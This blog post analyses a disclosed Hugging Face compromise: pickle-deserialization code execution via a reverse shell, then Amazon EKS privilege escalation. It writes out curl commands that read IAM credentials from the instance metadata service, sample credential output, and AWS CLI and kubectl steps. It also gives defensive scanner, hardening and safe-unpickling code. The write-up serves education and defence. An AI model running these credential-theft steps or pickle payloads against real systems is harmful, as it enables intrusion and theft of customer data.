In this post, we will look at how security researchers at Wiz were able to achieve Remote Code Execution on Hugging Face and escalate their privileges to read other people’s data. We will examine the consequences of the attack, and then consider countermeasures to prevent it from happening in the future.

Contents

What Is Hugging Face?

Pickle In PyTorch

Case Study - Inference RCE

Potential Consequences

Countermeasures

Revisiting Pickle

Final Thoughts - The Future

What Is Hugging Face?

Hugging Face is the largest AI-as-a-service (AIaaS) platform, allowing users to perform several actions related to AI/ML online:

Upload AI models for others to use

Download models made public by other users

Host and run their own models

Access large public datasets

Hugging Face is a big deal in the AI space, providing immense value to developers. Naturally, this makes it a fantastic target for attackers…

Pickle In PyTorch

The most common framework for ML models is PyTorch, a library in Python. When PyTorch loads models, it uses pickle, a module from Python's standard library, to perform deserialization.

To cut a long story short, deserializing objects insecurely can lead to remote code execution, allowing hackers to execute commands on the target machine.
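As a minimal and deliberately harmless sketch of why this happens: pickle lets an object define `__reduce__`, which returns a callable and its arguments, and the unpickler calls that callable while loading. Here the callable is simply `print`; an attacker would substitute something far more dangerous. The class name `Demo` is made up for illustration.

```python
import pickle


class Demo:
    """Hypothetical class whose pickled form runs a callable on load."""

    def __reduce__(self):
        # pickle stores "call print(...) to rebuild this object".
        # The unpickler performs that call during loading.
        return (print, ("this ran during pickle.loads",))


blob = pickle.dumps(Demo())

# Loading the bytes triggers the call; no Demo instance is ever created.
result = pickle.loads(blob)
```

Note that the victim only has to load the file. Nothing in the loading code needs to reference `Demo` or call any method on the result.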

While Hugging Face scans pickled files and warns users of their associated risks, it still has to support their upload! To learn more about this, read my article here on Machine Learning Backdoors.

Now, let’s take a look at how researchers at Wiz used pickle to compromise Hugging Face.

Case Study - Inference RCE





The Hugging Face Inference API is a tool that allows users to host and run their own models on a server:

Researchers at Wiz cloned a gpt2 model, then injected code to launch a reverse shell upon loading.

Creating The Payload



The researchers didn’t specify how this was done! However, I used this guide to construct some code similar to what the researchers may have used:

The commands to be executed are assigned to cmd. What does it do?

The rm and mkfifo commands prepare a named pipe.

cat /tmp/f reads from the named pipe.

/bin/sh -i runs an interactive shell and sends its output and error to netcat.

nc 127.0.0.1 1234 connects to a local listener on port 1234, and redirects its output to the named pipe.

Effectively, this would allow the researchers to execute any commands in the same environment as the model is hosted.

The researchers likely used a tool called fickling to inject and rebuild these commands into the pickle file automatically.

Initial Access



Upon uploading the malicious file to Hugging Face and interacting with it via the Inference API, this happened:

Connection successful! The code was insecurely deserialized and executed, giving the researchers command line access to the model’s environment.

The ethical hackers took it one step further:

By hooking a couple functions in Hugging Face's python code, which manages the model's inference result (following the Pickle-deserialization remote code execution stage), we achieved shell-like functionality.

In other words, they modified their script to interact with the Python functions used in the inference. This allowed them to send shell commands and receive their outputs directly through the API instead of requiring a reverse shell:

Amazon EKS Privilege Escalation

Feel free to skip this part if you care more about the impacts!

Next, the team executed commands to find the type of environment they had access to. They realized the model was running inside a Pod in a Kubernetes cluster hosted on Amazon EKS (Elastic Kubernetes Service).

You can read more about Kubernetes here - put simply, a pod is an environment used to run containers. These are small, executable, standalone code packages.

Wiz managed to escalate their privileges to obtain the role of a node (a Kubernetes machine with access to several pods), allowing them to perform further unauthorized actions. Their explanation is vague, so I followed the steps in this lab to demonstrate how it works:

Query the IAM role name

The node's Instance Metadata Service (IMDS) was reachable from inside the pod, which is a misconfiguration. By using curl against the security-credentials endpoint without specifying a role, we can retrieve the name of the role associated with the instance:

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

Output:

eks-challenge-cluster-nodegroup-NodeInstanceRole

Query the IAM role credentials

Now we know the role name, we can retrieve its associated credentials, again due to the IMDS misconfiguration:

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole

Output:

{

"AccessKeyId": "ASIA2AVYNEVMTNG2TE4R",

"Expiration": "2024-05-31 06:41:42+00:00",

"SecretAccessKey": "Runf8J7Mp1Nk53Coxxo5IRP6Vu8tdPsJFq/q6CQu",

"SessionToken": "FwoGZXIvYXdzEMf//////////wEaDGEFFceL0t2W3NZm4SK3AU6Mb91CBZpMama9tAjHQC385nXhNkX7pgYgC1pNqBahkZ+sdmIy/iUp7Z6svvS1JhXuv6A23gWZA+X6GzJN5wXYQDZleJ1HOlNUDCbDA3FtKK402ZZumTX+9PHBJFJ5Lj459aKzz+r4le1Ie1gzeYL1V0xWBu19V3s+ITXTGwtTPD2Oi1WlDO+tKxOn7QQ+CMl5zkMdxbcXqScFm0oQTXZ7GLwRAs1B6GjjsCydqsNXTunji4+ceSiWxuWyBjIt+enVYGYwynEeZ3pGSg+lG89wDu2XMsS3D6aUC6Hzuxokd6pYcxkuem5GI7YM"

}

Configure AWS CLI

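Set the relevant fields with the credentials obtained, replacing each uppercase placeholder with the matching value from the output above. This allows you to perform actions as the IAM role:

aws configure set aws_access_key_id ACCESS_KEY_ID

aws configure set aws_secret_access_key SECRET_ACCESS_KEY

aws configure set aws_session_token SESSION_TOKEN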

Retrieve EKS cluster token

This command uses the configured AWS CLI to obtain a token for the EKS cluster:

aws eks get-token --cluster-name wiz-eks-challenge

Exploit the privileges

Using the cluster token, the researchers were able to view the secrets associated with their pod (using kubectl get secrets). This allowed them to perform lateral movement within the EKS cluster!

Potential Consequences

The secrets obtained could have enabled cross-tenant access (viewing other people’s information), compromising the confidentiality of customer data. They may have also allowed the researchers to compromise the integrity and availability of other pods in the cluster with update and delete commands.

The whole attack chain is unique, insightful, and frightening. By chaining RCE with AWS privilege escalation, an attacker could theoretically read the data you submit to your model!

Countermeasures

Hugging Face released their own blog post, claiming they have resolved all the issues uncovered by Wiz. They have also adopted Wiz’s security technology to thwart future threats.

Hugging Face did not disclose how they did this, but we can take a good guess…

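To prevent privilege escalation, the developers likely enforced IMDSv2 with a hop limit, typically set to 1. IMDSv2 requires a session token obtained through a PUT request, and with a hop limit of 1 the token response cannot cross the extra network hop between the node and a pod. This prevents pods from accessing the instance metadata and obtaining the node role in the cluster.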
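To make the difference from the plain curl requests used earlier concrete, here is a rough sketch of the two-step IMDSv2 exchange. It only builds the requests and does not send them. The helper names and the `HARDENED_OPTIONS` dictionary are assumptions for illustration; the dictionary keys mirror the EC2 instance metadata options and are not taken from Hugging Face's configuration.

```python
import urllib.request

IMDS = "http://169.254.169.254"


def build_token_request(ttl_seconds=21600):
    """Step 1: IMDSv2 requires a PUT request to obtain a session token."""
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def build_metadata_request(path, token):
    """Step 2: every metadata read must present the session token."""
    return urllib.request.Request(
        f"{IMDS}/latest/meta-data/{path}",
        headers={"X-aws-ec2-metadata-token": token},
    )


# Assumed hardening settings, written as the keyword arguments one would
# pass to boto3's ec2.modify_instance_metadata_options for an instance.
HARDENED_OPTIONS = {
    "HttpEndpoint": "enabled",
    "HttpTokens": "required",        # reject tokenless IMDSv1 requests
    "HttpPutResponseHopLimit": 1,    # token response cannot take an extra hop
}
```

With `HttpTokens` set to `required`, a tokenless GET like the one in the lab is rejected, and with a hop limit of 1 a pod on the ordinary pod network should not be able to complete step 1 at all.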

Preventing RCE via pickle is much more complex! Hugging Face has decided to continue supporting pickle while mitigating the risks associated with it, using the following measures:

Developing automated scanning tools

Segmenting and enhancing security of the areas in which models are used
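To give a feel for what automated scanning can look like, here is a small heuristic sketch built on the standard library's `pickletools`. It lists the globals a pickle would import without ever loading it. This is not Hugging Face's scanner; the function names and the `SUSPICIOUS_MODULES` set are assumptions chosen for illustration, and a real scanner would need to be far more thorough.

```python
import pickle
import pickletools

# Assumed, incomplete denylist of modules that rarely belong in model files.
SUSPICIOUS_MODULES = {"os", "posix", "nt", "subprocess", "builtins", "sys", "socket"}


def find_imports(data: bytes):
    """Return (module, name) pairs referenced by a pickle, without loading it."""
    imports = []
    recent_strings = []  # STACK_GLOBAL takes module and name from the stack
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Older protocols encode the import as "module name".
            module, _, name = arg.partition(" ")
            imports.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # Heuristic: assume the two most recent strings are module and name.
            if len(recent_strings) >= 2:
                imports.append((recent_strings[-2], recent_strings[-1]))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return imports


def flag_suspicious(data: bytes):
    """Keep only imports whose top-level module is on the denylist."""
    return [
        (module, name)
        for module, name in find_imports(data)
        if module.split(".")[0] in SUSPICIOUS_MODULES
    ]
```

Because the scan only reads opcodes, it is safe to run on untrusted files. The trade-off is that a denylist can be bypassed by a sufficiently creative payload, which is one reason scanning alone is not a complete fix.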

Revisiting Pickle

Based on their blog post, it is clear that Hugging Face wants people to move away from using pickle. Here’s what they had to say about it.

We intend to continue to be the leader in protecting and securing the AI Community. Part of this will be monitoring and addressing risks related to pickle files. Sunsetting support of pickle is also not out of the question either, however, we do our best to balance the impact on the community as part of a decision like this.

Hugging Face has collaborated heavily on Safetensors, a secure alternative to using pickle files. They are also actively releasing materials educating users on the risks of AI/ML models. These are some commendable efforts which will help in making pickle a less effective attack vector.
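For code that still has to read pickle files in the meantime, the Python documentation describes a stopgap: subclass `pickle.Unpickler` and override `find_class` so that only approved globals can be imported. The sketch below follows that pattern; the `ALLOWED_GLOBALS` set and the helper name `restricted_loads` are assumptions for illustration, and this is a mitigation rather than a replacement for moving to Safetensors.

```python
import io
import pickle

# Assumed allowlist; a real one would list exactly what your files need.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle asks to import a global.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but refuses any global not on the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers such as dicts and lists load normally because they need no imports, while a payload that references `builtins.print` or `os.system` raises `pickle.UnpicklingError` before anything is called.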

Final Thoughts - The Future

As AI rapidly evolves, new threat vectors seemingly pop up every day - Hugging Face

Using a combination of pickle remote code execution and a misconfigured cloud environment, Wiz researchers were able to seriously compromise Hugging Face's infrastructure.

To improve AI security, we should all stop using the pickle library:

Pro-actively start replacing your pickle files with Safetensors

Keep opening issues/PRs upstream about security to your favorite libraries to push secure defaults as much as possible upstream.

This is just the tip of the iceberg - several platforms are likely vulnerable in some capacity to similar attacks. As the AI/ML community continues to push new features at a breakneck pace, more and more vulnerabilities will be introduced, giving way to exploits with devastating real-world impact in the future.

Check out my article below to learn more about Backdoors in ML. Thanks for reading.

Backdoors in ML - The Dark Side of Hugging Face

